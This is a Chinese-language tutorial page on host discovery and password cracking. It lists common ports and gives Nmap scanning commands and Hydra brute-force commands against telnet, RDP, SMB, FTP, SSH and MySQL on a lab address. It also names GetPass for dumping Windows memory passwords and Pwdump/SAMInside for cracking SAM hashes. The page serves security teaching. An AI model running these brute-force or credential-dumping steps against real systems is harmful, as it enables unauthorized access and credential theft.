扫描技术
主机探测与端口扫描
- 主机测探是指确定目标主机是否存活
- 端口扫描就是寻找在线主机所开放的端口,并且在端口上所运行的服务.甚至可以进一步确定目标主机操作系统类型和更详细的信息
基础知识
- 常见端口号
| 端口号 | 服务 |
|---|---|
| 21 | FTP |
| 22 | SSH |
| 23 | Telnet |
| 25 | SMTP |
| 80 | HTTP |
| 443 | HTTPS |
| 1433 | SQL Server |
| 1521 | Oracle |
| 3306 | MySQL |
| 3389 | RDP |
Nmap
- Network Mapper,最早是Linux下的网络扫描和嗅探工具包,已经集成到KaliLinux中
- 官网https://nmap.org/
- Windows:nmap-7.91-setup.rar
| 参数 | 结果 |
|---|---|
| -sP | ping 扫描 |
| -p | 指定端口范围 |
| -sV | 服务版本探测 |
| -O(大写) | 启用操作系统探测 |
| -A | 全面扫描 |
| -oN | 保存txt |
扫描命令示例
# windows使用时需要以最高权限运行
# 扫描10.0.0.0整个网段
nmap -sP 10.0.0.0/24
# 扫描10.0.0.3的21,23-25,3389端口
nmap -p 21,23-25,3389 10.0.0.3
# 扫描21,23的服务版本
nmap -p 21,23 10.0.0.3 -sV
# 全面扫描
nmap -A 10.0.0.3
# 扫描目标系统版本
nmap -O 10.0.0.3
#将扫描结果保存到文件
nmap -p 21,23 10.0.0.3 -oN c:\result.txt破解
九头蛇
- hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中
- hydra-8.1-windows.zip
-l 指定用户名 -p 指定密码 -L 指定用户名字典 -P 指定密码字典
#使用用户名密码手动测试一次
Hydra -l administrator -p 123 10.0.0.3 telnet
#使用指定用户名和密码字典进行暴力破解telnet
Hydra -l administrator -P e:\password.txt 10.0.0.3 telnet
#使用指定用户名和密码字典进行暴力破解rdp
Hydra -l administrator -P e:\password.txt 10.0.0.3 rdp
#使用指定用户名和密码字典进行暴力破解smb
Hydra -l administrator -P e:\password.txt 10.0.0.3 smb
#使用指定用户名和密码字典进行暴力破解ftp
Hydra -l administrator -P e:\password.txt 10.0.0.3 ftp
#使用指定用户名和密码字典进行暴力破解ssh
Hydra -l administrator -P e:\password.txt 10.0.0.3 ssh
#使用指定用户名和密码字典进行暴力破解mysql
Hydra -l administrator -P e:\password.txt 10.0.0.3 mysql
#使用指定用户名字典和密码字典进行暴力破解telnet
Hydra -L e:\username.txt -P e:\password.txt 10.0.0.3 telnetGetpass
- 一键直接获取当前 windows 系统在内存中的明文密码
- 支持win7,server 2008以下系统
- GetPass.rar
Pwdump和saminside本地暴力破解
Pwdump提取sam中的HASH值并保存
使用saminside进行暴力破解
Alipay
Wechat
最后一次更新于2020-11-26 15:30
0 条评论